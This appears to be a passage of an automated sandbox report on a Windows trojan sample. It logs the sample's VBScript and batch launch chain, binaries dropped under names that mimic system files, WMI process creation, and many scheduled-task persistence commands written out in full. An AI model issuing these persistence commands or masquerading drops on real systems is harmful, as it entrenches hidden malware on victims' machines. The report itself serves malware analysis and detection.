          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA0F781_2_00BA0F78
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FC5F07_2_00007FFAAC3FC5F0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAA8D7_2_00007FFAAC3FAA8D
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAF087_2_00007FFAAC3FAF08
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAF587_2_00007FFAAC3FAF58
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FC7E07_2_00007FFAAC3FC7E0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2BF07_2_00007FFAAC3F2BF0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F9DA17_2_00007FFAAC3F9DA1
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAF357_2_00007FFAAC3FAF35
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2AC07_2_00007FFAAC3F2AC0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2BF07_2_00007FFAAC3F2BF0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FA0057_2_00007FFAAC3FA005
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2BF07_2_00007FFAAC3F2BF0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FA0057_2_00007FFAAC3FA005
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9E360 appears 52 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9E28C appears 35 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9ED00 appears 31 times
          Source: comProviderServer.exe.1.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WmiPrvSE.exe.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: bdoMPjmZJHMIJMdqEctkzcHPTiy.exe.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: bdoMPjmZJHMIJMdqEctkzcHPTiy.exe0.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: StartMenuExperienceHost.exe.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: bdoMPjmZJHMIJMdqEctkzcHPTiy.exe1.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: file.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@43/33@0/0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B86EC9 GetLastError,FormatMessageW,1_2_00B86EC9
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B99E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_00B99E1C
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\Public\Downloads\explorer.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\eb81551d4b228cccaab002c77cb01b12655e3c98
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\user\AppData\Local\Temp\uw0cV3nz2CJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs"
          Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname1_2_00B9D5D4
          Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime1_2_00B9D5D4
          Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG1_2_00B9D5D4
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewDriverIntosessionnet\comProviderServer.exe "C:\reviewDriverIntosessionnet\comProviderServer.exe"
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 12 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewDriverIntosessionnet\comProviderServer.exe "C:\reviewDriverIntosessionnet\comProviderServer.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
